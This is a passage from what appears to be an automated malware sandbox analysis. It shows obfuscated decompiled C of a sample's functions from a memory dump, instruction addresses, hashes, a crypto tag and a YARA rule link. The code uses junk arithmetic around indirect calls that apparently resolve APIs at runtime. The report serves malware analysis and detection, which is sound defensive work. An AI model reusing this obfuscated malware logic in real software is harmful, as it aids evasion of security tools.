					_t358 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _v16);
				}
				_v12 = _t560;
				 *((intOrPtr*)(_t437 + 0x41c92d)) = _t358;
				_t563 = _v12;
				_t359 =  *((intOrPtr*)(_t437 + 0x41f060))();
				 *_t587 =  *_t587 & 0x00000000;
				 *_t587 =  *_t587 | _t359;
				_t149 = _t437 + 0x41c69d; // 0x41c69d
				_v16 = 0;
				 *_t587 =  *_t587 | _t149;
				_t361 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _t563);
				_v12 = _t510;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) & 0x00000000;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) | _t510 - _v12 | _t361;
				_t588 =  &(_t587[1]);
				_pop( *_t160);
				_t468 = _v16;
				 *_t588 = (_t361 & 0x00000000) +  *_t587;
				 *_t588 = _t468;
				_t164 = _t437 + 0x41c2d3; // 0x41c2d3
				_v16 = _v16 & 0x00000000;
				 *_t588 =  *_t588 | _t164;
				_t365 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12, _v8);
				_v12 = _t468;
				 *(_t437 + 0x41d1f2) = _t365;
				_pop( *_t172);
				_t473 = _v12 & 0x00000000 | _v8;
				_pop( *_t174);
				 *_t588 = _v12;
				_push(_t365 & 0x00000000 ^ _v16);
				_pop(_t514);
				_t516 = 0;
				_v8 = 0;
				 *_t588 =  *_t588 | _t514 + _t473;
				_t178 = _t437 + 0x41d35c; // 0x41d35c
				 *_t588 = _t178;
				_t180 = _t437 + 0x41cffa; // 0x41cffa
				 *_t588 =  *_t588 ^ _t576;
				 *_t588 = _t180;
				_t371 =  *((intOrPtr*)(_t437 + 0x41f068))(_t576, _v12, _v8);
				_v12 = _t516;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) & 0x00000000;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) | _t516 - _v12 | _t371;
				_t519 = _v12;
				_t373 = 0 ^  *_t588;
				_t589 =  &(_t588[1]);
				_v8 = _t373;
				_v12 = 0;
				 *_t589 =  *_t589 + _v8;
				 *_t589 = _t473 & 0x00000000 ^ (_t373 - _v8 |  *(_t437 + 0x41d1e6));
				_t196 = _t437 + 0x41c887; // 0x41c887
				 *_t589 = _t196;
				_t378 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8, _v12);
				_v12 = _v12 & 0x00000000;
				 *_t589 =  *_t589 + _t378;
				_t202 = _t437 + 0x41c411; // 0x41c411
				_v16 = 0;
				 *_t589 =  *_t589 + _t202;
				_t380 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12);
				_t590 = _t589 - 0xfffffffc;
				 *_t590 =  *_t590 ^ _t540;
				_t541 = _t380;
				_t543 = 0;
				_v12 = _t563;
				_t566 = _v12;
				if((0 ^  *(_t437 + 0x41c39d)) > _t541 +  *_t589) {
					_t209 = _t437 + 0x41c887; // 0x41c887
					 *_t590 =  *_t590 & 0x00000000;
					 *_t590 =  *_t590 | _t209;
					_t210 = _t437 + 0x41c411; // 0x41c411
					_v12 = _v12 & 0x00000000;
					 *_t590 =  *_t590 | _t210;
					_t421 =  *((intOrPtr*)(_t437 + 0x41f064))(_v12, _t576);
					 *_t590 = _t543;
					 *((intOrPtr*)(_t437 + 0x41c9b5)) = _t421;
					_t543 = 0;
				}
				_t480 = 0 ^  *_t590;
				_t591 =  &(_t590[1]);
				_t383 =  *_t591;
				_t592 =  &(_t591[1]);
				if(_t480 > _t383) {
					_t216 = _t437 + 0x41d2f2; // 0x41d2f2
					_v16 = _v16 & 0x00000000;
					 *_t592 =  *_t592 ^ _t216;
					_t220 = _t437 + 0x41d16f; // 0x41d16f
					_v16 = 0;
					 *_t592 =  *_t592 ^ _t220;
					_t383 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _v16);
				}
				 *_t592 = _t576;
				 *(_t437 + 0x41c0d6) = 0 ^ _t383;
				_t579 = 0;
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t566;
				_t228 = _t437 + 0x41cd35; // 0x41cd35
				 *_t592 =  *_t592 ^ _t480;
				 *_t592 =  *_t592 + _t228;
				_t229 = _t437 + 0x41ca62; // 0x41ca62
				_v16 = 0;
				 *_t592 =  *_t592 + _t229;
				_t386 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t480, _v12);
				_v16 = _t543;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) & 0x00000000;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) ^ (_t543 - _v16 | _t386);
				_t546 = _v16;
				_t483 = _t480;
				_v12 = 0;
				 *_t592 =  *_t592 | _t386 & 0x00000000 ^ (_t480 & 0x00000000 | _a4);
				_t243 = _t437 + 0x41c84c; // 0x41c84c
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t243;
				_t390 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v12);
				_v16 = _t519;
				 *((intOrPtr*)(_t437 + 0x41d2c7)) = _t390;
				_t522 = _v16;
				_t593 = _t592 - 0xfffffffc;
				 *_t593 =  *_t593 - _t437;
				 *_t593 =  *_t592 - 1;
				_t251 = _t437 + 0x41ceef; // 0x41ceef
				_v16 = 0;
				 *_t593 =  *_t593 | _t251;
				_t254 = _t437 + 0x41c9c8; // 0x41c9c8
				 *_t593 =  *_t593 - _t522;
				 *_t593 = _t254;
				_t396 =  *((intOrPtr*)(_t437 + 0x41f068))(_t522, _v16, _t437);
				_v16 = _t522;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) & 0x00000000;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) | _t522 ^ _v16 | _t396;
				_t525 = _v16;
				_t398 =  *_t593;
				_t594 = _t593 - 0xfffffffc;
				if(_t398 > 0) {
					if(_a12 != 0) {
						_t402 = _t398;
						 *_t301 = _t483 & 0x00000000 | _t398 ^  *_t594 ^ _a12;
						_v12 = _v12 + _t402;
						_push(_v12);
						_pop(_t486);
						_t570 = _t566;
						 *_t594 =  *_t594 ^ _t486;
						_t487 = _t437;
						_t488 = _t487 & _a8;
						 *_t306 = _t570;
						_v8 = _v8 + _t488;
						_push(_v8);
						_pop(_t566);
						_t437 = _t437;
						 *_t594 =  *_t594 & 0x00000000;
						 *_t594 =  *_t594 + _t566;
						 *_t594 =  *_t594 ^ _t579;
						 *_t594 =  *_t594 ^ _t488;
						 *_t594 = _t402;
						_t398 = E00EA31B3(_t437, _t525, _t546, _t566, _v16, _t579, _t488);
					}
					_push(_t437);
					return _t398 ^ _t398;
				} else {
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 | _t398;
					_t263 = _t437 + 0x41cfc3; // 0x41cfc3
					_v16 = _v16 & 0x00000000;
					 *_t594 =  *_t594 ^ _t263;
					_t267 = _t437 + 0x41c769; // 0x41c769
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 ^ _t267;
					_t405 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t483);
					_v16 = _t483;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) & 0x00000000;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) ^ (_t483 & 0x00000000 | _t405);
					 *_t275 = _t525;
					_t596 = _t594 - 0xfffffffc;
					 *_t596 =  *_t596 - _t437;
					 *_t596 =  *_t596 | _v16;
					_t277 = _t437 + 0x41cd95; // 0x41cd95
					 *_t596 =  *_t596 ^ _t525;
					 *_t596 = _t277;
					_t408 =  *((intOrPtr*)(_t437 + 0x41f060))(_t525, _t437);
					 *_t596 =  *_t596 & 0x00000000;
					 *_t596 =  *_t596 + _t408;
					_t279 = _t437 + 0x41cbf8; // 0x41cbf8
					 *_t596 = _t279;
					_t410 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v16);
					_pop( *_t282);
					 *_t596 = _t437;
					_t442 = _t410;
					_t444 = 0;
					_push(_t546);
					if((0 + _v12 & 0x00000000 ^ (_t546 ^  *_t596 |  *(_t444 + 0x41c691))) > _t442 + 0 + _v12) {
						_t285 = _t444 + 0x41cd95; // 0x41cd95
						 *_t596 = _t285;
						_t287 = _t444 + 0x41cbf8; // 0x41cbf8
						_v12 = _v12 & 0x00000000;
						 *_t596 =  *_t596 | _t287;
						_t416 =  *((intOrPtr*)(_t444 + 0x41f064))(_v12, _v16);
						_v8 = _t525;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) & 0x00000000;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) | _t525 ^ _v8 | _t416;
					}
					return  *_t596;
				}
			}

0x00ea31b3
0x00ea31b3
0x00ea31b3
0x00ea31b9
0x00ea31bf
0x00ea31c2
0x00ea31c5
0x00ea31cb
0x00ea31cc
0x00ea31cf
0x00ea31d2
0x00ea31d8
0x00ea31df
0x00ea31e2
0x00ea31e5
0x00ea31ed
0x00ea31f0
0x00ea31f5
0x00ea31f9
0x00ea31fc
0x00ea31fe
0x00ea31ff
0x00ea320e
0x00ea3210
0x00ea3215
0x00ea3217
0x00ea321d
0x00ea3224
0x00ea3227
0x00ea322a
0x00ea3230
0x00ea3231
0x00ea3234
0x00ea3237
0x00ea3237
0x00ea323d
0x00ea3245
0x00ea324c
0x00ea3252
0x00ea3255
0x00ea325c
0x00ea3260
0x00ea3263
0x00ea3269
0x00ea3270
0x00ea3273
0x00ea327a
0x00ea327e
0x00ea3281
0x00ea3288
0x00ea328c
0x00ea328f
0x00ea3295
0x00ea329d
0x00ea32a1
0x00ea32a6
0x00ea32a9
0x00ea32b4
0x00ea32b6
0x00ea32b9
0x00ea32bb
0x00ea32c2
0x00ea32c5
0x00ea32c8
0x00ea32ce
0x00ea32d8
0x00ea32db
0x00ea32e1
0x00ea32e8
0x00ea32ee
0x00ea32ee
0x00ea32f6
0x00ea32fa
0x00ea32fd
0x00ea3300
0x00ea3307
0x00ea330b
0x00ea330e
0x00ea3315
0x00ea3319
0x00ea331c
0x00ea3323
0x00ea3326
0x00ea3329
0x00ea3335
0x00ea3338
0x00ea333f
0x00ea3342
0x00ea3345
0x00ea3348
0x00ea3349
0x00ea334a
0x00ea3359
0x00ea335b
0x00ea3360
0x00ea3362
0x00ea3369
0x00ea336d
0x00ea3370
0x00ea3377
0x00ea337a
0x00ea337d
0x00ea337d
0x00ea3384
0x00ea3387
0x00ea338a
0x00ea3390
0x00ea3396
0x00ea339d
0x00ea33a0
0x00ea33a7
0x00ea33aa
0x00ea33ad
0x00ea33b6
0x00ea33b9
0x00ea33c2
0x00ea33c5
0x00ea33d4
0x00ea33db
0x00ea33de
0x00ea33e1
0x00ea33e4
0x00ea33e5
0x00ea33e6
0x00ea33f1
0x00ea33f3
0x00ea33f8
0x00ea33fa
0x00ea3400
0x00ea3407
0x00ea340a
0x00ea3410
0x00ea3417
0x00ea341a
0x00ea3420
0x00ea3427
0x00ea342d
0x00ea342d
0x00ea3432
0x00ea3439
0x00ea343c
0x00ea343f
0x00ea3445
0x00ea344f
0x00ea3452
0x00ea3458
0x00ea3462
0x00ea3465
0x00ea346b
0x00ea3473
0x00ea347a
0x00ea3483
0x00ea3489
0x00ea3490
0x00ea3493
0x00ea349a
0x00ea349e
0x00ea34a1
0x00ea34a7
0x00ea34ae
0x00ea34b1
0x00ea34b8
0x00ea34bc
0x00ea34bf
0x00ea34ce
0x00ea34d5
0x00ea34d8
0x00ea34db
0x00ea34de
0x00ea34df
0x00ea34e2
0x00ea34ed
0x00ea34ef
0x00ea34f2
0x00ea34f4
0x00ea34fb
0x00ea34ff
0x00ea3502
0x00ea3509
0x00ea350d
0x00ea3510
0x00ea351c
0x00ea3523
0x00ea3529
0x00ea3529
0x00ea352f
0x00ea3535
0x00ea3538
0x00ea353f
0x00ea3542
0x00ea3545
0x00ea354b
0x00ea3555
0x00ea3558
0x00ea355e
0x00ea3565
0x00ea3568
0x00ea3574
0x00ea3577
0x00ea357a
0x00ea3581
0x00ea3582
0x00ea3585
0x00ea3595
0x00ea3598
0x00ea359a
0x00ea35a0
0x00ea35a7
0x00ea35aa
0x00ea35b1
0x00ea35b5
0x00ea35b8
0x00ea35b8
0x00ea35be
0x00ea35c5
0x00ea35cb
0x00ea35ce
0x00ea35d5
0x00ea35d9
0x00ea35dc
0x00ea35e2
0x00ea35ec
0x00ea35ef
0x00ea35f5
0x00ea35fd
0x00ea3604
0x00ea3616
0x00ea3619
0x00ea361c
0x00ea3622
0x00ea3628
0x00ea362b
0x00ea3631
0x00ea3638
0x00ea363b
0x00ea3641
0x00ea3648
0x00ea3657
0x00ea365a
0x00ea3663
0x00ea366b
0x00ea366e
0x00ea366f
0x00ea3674
0x00ea3675
0x00ea367f
0x00ea3682
0x00ea368b
0x00ea368e
0x00ea3695
0x00ea3698
0x00ea369b
0x00ea36a1
0x00ea36a9
0x00ea36b0
0x00ea36b6
0x00ea36bb
0x00ea36be
0x00ea36c1
0x00ea36d5
0x00ea36df
0x00ea36e5
0x00ea36e8
0x00ea36f1
0x00ea36f4
0x00ea36fa
0x00ea3701
0x00ea3704
0x00ea370a
0x00ea3714
0x00ea3717
0x00ea3722
0x00ea3727
0x00ea372b
0x00ea3730
0x00ea3731
0x00ea373e
0x00ea3743
0x00ea3745
0x00ea374c
0x00ea3750
0x00ea3753
0x00ea3759
0x00ea3760
0x00ea3763
0x00ea376b
0x00ea3772
0x00ea3778
0x00ea3778
0x00ea377b
0x00ea377e
0x00ea3783
0x00ea3786
0x00ea378b
0x00ea378d
0x00ea3793
0x00ea379a
0x00ea379d
0x00ea37a3
0x00ea37ad
0x00ea37b0
0x00ea37b0
0x00ea37b8
0x00ea37bf
0x00ea37c5
0x00ea37c6
0x00ea37cd
0x00ea37d0
0x00ea37d7
0x00ea37da
0x00ea37dd
0x00ea37e3
0x00ea37ed
0x00ea37f0
0x00ea37f6
0x00ea37fe
0x00ea3805
0x00ea380b
0x00ea381a
0x00ea381b
0x00ea3825
0x00ea3828
0x00ea382e
0x00ea3835
0x00ea3838
0x00ea383e
0x00ea3845
0x00ea384b
0x00ea3853
0x00ea3858
0x00ea385b
0x00ea385e
0x00ea3864
0x00ea386e
0x00ea3871
0x00ea3878
0x00ea387b
0x00ea387e
0x00ea3884
0x00ea388c
0x00ea3893
0x00ea3899
0x00ea38a2
0x00ea38a5
0x00ea38ab
0x00ea39ad
0x00ea39bb
0x00ea39c0
0x00ea39c3
0x00ea39c6
0x00ea39c9
0x00ea39ca
0x00ea39cc
0x00ea39cf
0x00ea39d0
0x00ea39d7
0x00ea39da
0x00ea39dd
0x00ea39e0
0x00ea39e1
0x00ea39e3
0x00ea39e7
0x00ea39eb
0x00ea39ee
0x00ea39f4
0x00ea39f7
0x00ea39f7
0x00ea39fc
0x00ea3a11
0x00ea38b1
0x00ea38b2
0x00ea38b6
0x00ea38b9
0x00ea38bf
0x00ea38c6
0x00ea38c9
0x00ea38d0
0x00ea38d4
0x00ea38d7
0x00ea38dd
0x00ea38e5
0x00ea38ec
0x00ea38f5
0x00ea3904
0x00ea3908
0x00ea390b
0x00ea390e
0x00ea3915
0x00ea3918
0x00ea391b
0x00ea3922
0x00ea3926
0x00ea3929
0x00ea3932
0x00ea3935
0x00ea393d
0x00ea3945
0x00ea3949
0x00ea394e
0x00ea394f
0x00ea3961
0x00ea3963
0x00ea396c
0x00ea396f
0x00ea3975
0x00ea397c
0x00ea397f
0x00ea3985
0x00ea398d
0x00ea3994
0x00ea399a
0x00ea39a6
0x00ea39a6

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction ID: b76b8eb9450a1e5e951282259592c6f92de3064350ea9e0b48f971c6b42d13d6
Opcode Fuzzy Hash: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction Fuzzy Hash: 60521572944608EFEB04DFA4C88A7AEBBF1FF08310F1585AED886EA145D7345664CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3FAB, Relevance: .6, Instructions: 566
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00EA3FAB(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t346;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				void* _t359;
				void* _t361;
				signed int _t362;
				signed int _t367;
				void* _t369;
				void* _t370;
				signed int _t374;
				signed int _t377;
				signed int _t380;
				signed int _t385;
				void* _t387;
				void* _t389;
				intOrPtr _t390;
				void _t393;
				signed int _t397;
				intOrPtr _t403;
				signed int _t408;
				signed int _t410;
				signed int _t415;
				signed int _t418;
				void* _t420;
				signed int _t421;
				void* _t424;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				void* _t437;
				void* _t439;
				signed int _t440;
				signed int _t443;
				intOrPtr _t445;
				signed int _t451;
				signed int _t454;
				signed int _t457;
				signed int _t459;
				signed int _t471;
				signed int _t473;
				signed int _t475;
				signed int _t478;
				void* _t481;
				signed int _t488;
				signed int _t489;
				signed int _t498;
				signed int _t500;
				signed int _t502;
				signed int _t504;
				signed int _t510;
				signed int _t513;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t520;
				signed int _t525;
				signed int _t528;
				signed int _t530;
				signed int _t532;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				signed int _t544;
				signed int _t548;
				signed int _t553;
				signed int _t559;
				signed int _t562;
				signed int _t565;
				void* _t570;
				void* _t577;
				signed int _t579;
				signed int _t582;
				signed int _t585;
				signed int _t590;
				void* _t591;
				signed int _t595;
				signed int _t598;
				signed int _t601;
				signed int _t604;
				signed int* _t608;
				signed int* _t609;
				signed int* _t610;
				signed int* _t611;
				signed int* _t612;
				signed int* _t613;
				signed int* _t614;
				signed int* _t615;
				signed int* _t616;
				signed int* _t617;
				signed int* _t621;
				signed int* _t622;
				signed int* _t623;

				_t585 = __esi;
				_t454 = __ebx;
				 *(_t598 - 0x1c) =  *(_t598 - 0x1c) & 0x00000000;
				_push( *(_t598 - 0x1c));
				 *_t608 =  *_t608 + __ebx + 0x41c4c0;
				_push( *((intOrPtr*)(__ebx + 0x41f060))());
				_pop( *_t6);
				_push( *(_t598 - 0x20));
				_pop( *_t8);
				_push(__ebx);
				 *_t608 =  *_t608 & 0x00000000;
				 *_t608 =  *_t608 | __ebx + 0x0041cf44;
				_push( *(_t598 - 0x1c));
				 *_t608 = __ebx + 0x41d05b;
				_t346 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t598 - 0x1c) = __edi;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) & 0x00000000;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) ^ (__edi -  *(_t598 - 0x1c) | _t346);
				_t559 =  *(_t598 - 0x1c);
				_t609 = _t608 - 0xfffffffc;
				 *(_t598 - 0x1c) = 0;
				_push( *(_t598 - 0x1c));
				 *_t609 =  *_t609 |  *_t608;
				_push( *(_t598 - 0x1c));
				 *_t609 = __ebx + 0x41c0d0;
				 *(_t598 - 0x20) =  *(_t598 - 0x20) & 0x00000000;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 | __ebx + 0x0041c99a;
				_t351 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x20) = __ecx;
				 *(__ebx + 0x41c6ff) = 0 ^ _t351;
				_t352 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push( *(_t598 - 0x1c));
				 *_t609 = _t352;
				_push(__edx);
				 *_t609 =  *_t609 ^ __edx;
				 *_t609 =  *_t609 ^ __ebx + 0x0041d1ce;
				 *(_t598 - 0x20) = 0;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 ^ __ebx + 0x0041c36e;
				_t355 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x24) = __edx;
				 *(__ebx + 0x41c65d) = 0 ^ _t355;
				_t510 =  *(_t598 - 0x24);
				_t610 = _t609 - 0xfffffffc;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) & 0x00000000;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) | _t510 -  *_t610 ^ (_t355 & 0x00000000) +  *_t609;
				_t513 = _t510;
				_push(_t513);
				 *_t610 =  *_t610 & 0x00000000;
				 *_t610 =  *_t610 ^ __ebx + 0x0041c369;
				_t359 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 + _t359;
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 ^ __ebx + 0x0041c4d6;
				_t361 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t611 = _t610 - 0xfffffffc;
				 *_t611 =  *_t611 | _t513;
				_t514 = _t361;
				_t362 = _t514 + ( *(_t598 - 0x20) & 0x00000000 |  *_t610);
				_t516 = 0;
				 *_t611 = _t516;
				_t471 = 0 ^  *(__ebx + 0x41c434);
				_t519 = 0;
				if(_t471 > _t362) {
					_push(_t471);
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + __ebx + 0x41c369;
					 *(_t598 - 0x1c) = 0;
					_push( *(_t598 - 0x1c));
					 *_t611 =  *_t611 ^ __ebx + 0x0041c4d6;
					_t362 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) & 0x00000000;
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) ^ _t598 ^  *_t611 ^ _t362;
				_t601 = _t598;
				if( *((intOrPtr*)(_t601 - 0x10)) != 2) {
					if( *((intOrPtr*)(_t601 - 0x10)) == 4) {
						_t156 = _t454 + 0x41d1be; // 0x41d1be
						 *_t611 = _t156;
						_t158 = _t454 + 0x41c0a8; // 0x41c0a8
						 *_t611 =  *_t611 & 0x00000000;
						 *_t611 =  *_t611 ^ _t158;
						_push( *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24)));
						_pop( *_t160);
						_push( *(_t601 - 0x20));
						_pop( *_t162);
						 *((intOrPtr*)(_t601 - 8)) = 1;
						_t164 = _t454 + 0x41c6f8; // 0x41c6f8
						 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
						 *_t611 =  *_t611 ^ _t164;
						_t408 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20));
						 *(_t601 - 0x20) = _t519;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) & 0x00000000;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) | _t519 ^  *(_t601 - 0x20) | _t408;
						_t548 =  *(_t601 - 0x20);
						 *((intOrPtr*)(_t601 - 0xc)) = 0x55;
						_t177 = _t454 + 0x41c356; // 0x41c356
						 *(_t601 - 0x1c) =  *(_t601 - 0x1c) & 0x00000000;
						 *_t611 =  *_t611 | _t177;
						_t410 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
						 *(_t601 - 0x24) = _t559;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) & 0x00000000;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) | _t559 & 0x00000000 ^ _t410;
						_t559 =  *(_t601 - 0x24);
						 *((intOrPtr*)(_t601 - 0x18)) = 2;
						_t189 = _t454 + 0x41cc3e; // 0x41cc3e
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 ^ _t189;
						_t193 = _t454 + 0x41cf5b; // 0x41cf5b
						 *_t611 =  *_t611 ^ _t585;
						 *_t611 = _t193;
						_t362 =  *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24));
						 *(_t601 - 0x20) = _t548;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) & 0x00000000;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) | _t548 & 0x00000000 | _t362;
						_t519 =  *(_t601 - 0x20);
					}
				} else {
					_t65 = _t454 + 0x41cb7a; // 0x41cb7a
					 *(_t601 - 0x1c) = 0;
					 *_t611 =  *_t611 + _t65;
					_t68 = _t454 + 0x41c8ec; // 0x41c8ec
					 *(_t601 - 0x24) = 0;
					 *_t611 =  *_t611 ^ _t68;
					_t415 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x24),  *(_t601 - 0x1c));
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) & 0x00000000;
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) ^ (_t585 & 0x00000000 | _t415);
					_t595 = _t585;
					_t76 = _t454 + 0x41c379; // 0x41c379
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 + _t76;
					_t80 = _t454 + 0x41c532; // 0x41c532
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 | _t80;
					_t418 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x20));
					 *_t611 = _t418;
					_t86 = _t454 + 0x41d201; // 0x41d201
					 *_t611 = _t86;
					_t420 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x24));
					_t498 = _t471 & 0x00000000 |  *_t611;
					_t621 =  &(_t611[1]);
					 *_t621 =  *_t621 + _t559;
					_t577 = _t420;
					_t421 = _t577 + _t498;
					_t579 = 0;
					_t500 = _t498 & 0x00000000 ^ (_t421 ^  *_t621 |  *(_t454 + 0x41cc21));
					_t424 = _t421;
					if(_t500 > _t424) {
						_t90 = _t454 + 0x41c532; // 0x41c532
						 *_t621 =  *_t621 & 0x00000000;
						 *_t621 =  *_t621 | _t90;
						_t91 = _t454 + 0x41d201; // 0x41d201
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t621 =  *_t621 | _t91;
						_t451 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x24), _t519);
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) & 0x00000000;
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) | _t601 -  *_t621 ^ _t451;
						_t601 = _t601;
					}
					_t622 = _t621 - 0xfffffffc;
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 |  *_t621;
					_t100 = _t454 + 0x41d01d; // 0x41d01d
					 *_t622 =  *_t622 ^ _t579;
					 *_t622 =  *_t622 | _t100;
					_t101 = _t454 + 0x41c37d; // 0x41c37d
					 *_t622 = _t101;
					_t429 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x1c), _t579, _t519);
					 *(_t601 - 0x20) = _t579;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) & 0x00000000;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) | _t579 & 0x00000000 | _t429;
					_t582 =  *(_t601 - 0x20);
					_t430 =  *((intOrPtr*)(_t454 + 0x41f060))();
					 *_t622 =  *_t622 ^ _t595;
					 *_t622 =  *_t622 | _t430;
					_t111 = _t454 + 0x41c8c2; // 0x41c8c2
					 *_t622 =  *_t622 - _t454;
					 *_t622 =  *_t622 + _t111;
					_t112 = _t454 + 0x41c737; // 0x41c737
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 ^ _t112;
					_t433 =  *((intOrPtr*)(_t454 + 0x41f068))(_t582, _t454, _t595);
					 *_t114 = _t433;
					_push( *(_t601 - 0x20));
					_pop( *_t116);
					_t623 = _t622 - 0xfffffffc;
					 *(_t601 - 0x20) = _t582;
					 *(_t454 + 0x41c606) = _t433 & 0x00000000 |  *_t622;
					_t559 =  *(_t601 - 0x20);
					 *((intOrPtr*)(_t601 - 8)) = 3;
					_t121 = _t454 + 0x41d2fe; // 0x41d2fe
					 *(_t601 - 0x1c) = 0;
					 *_t623 =  *_t623 | _t121;
					_t437 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
					 *_t623 =  *_t623 ^ _t559;
					 *_t623 =  *_t623 + _t437;
					_t125 = _t454 + 0x41d22a; // 0x41d22a
					 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
					 *_t623 =  *_t623 | _t125;
					_t439 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24), _t559);
					_t502 = _t500 & 0x00000000 |  *_t623;
					_t611 =  &(_t623[1]);
					 *(_t601 - 0x24) = _t519;
					_push(_t502 + _t439);
					_t553 =  *(_t601 - 0x24);
					_pop(_t440);
					 *(_t601 - 0x20) = _t440;
					_t504 = _t502 & 0x00000000 ^ (_t440 ^  *(_t601 - 0x20) |  *(_t454 + 0x41c48f));
					_t443 =  *(_t601 - 0x20);
					if(_t504 > _t443) {
						_t136 = _t454 + 0x41d2fe; // 0x41d2fe
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 + _t136;
						_t140 = _t454 + 0x41d22a; // 0x41d22a
						 *(_t601 - 0x20) = 0;
						 *_t611 =  *_t611 ^ _t140;
						_t443 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x20),  *(_t601 - 0x24));
					}
					 *_t611 = _t595;
					 *(_t454 + 0x41c2cf) = 0 ^ _t443;
					_t585 = 0;
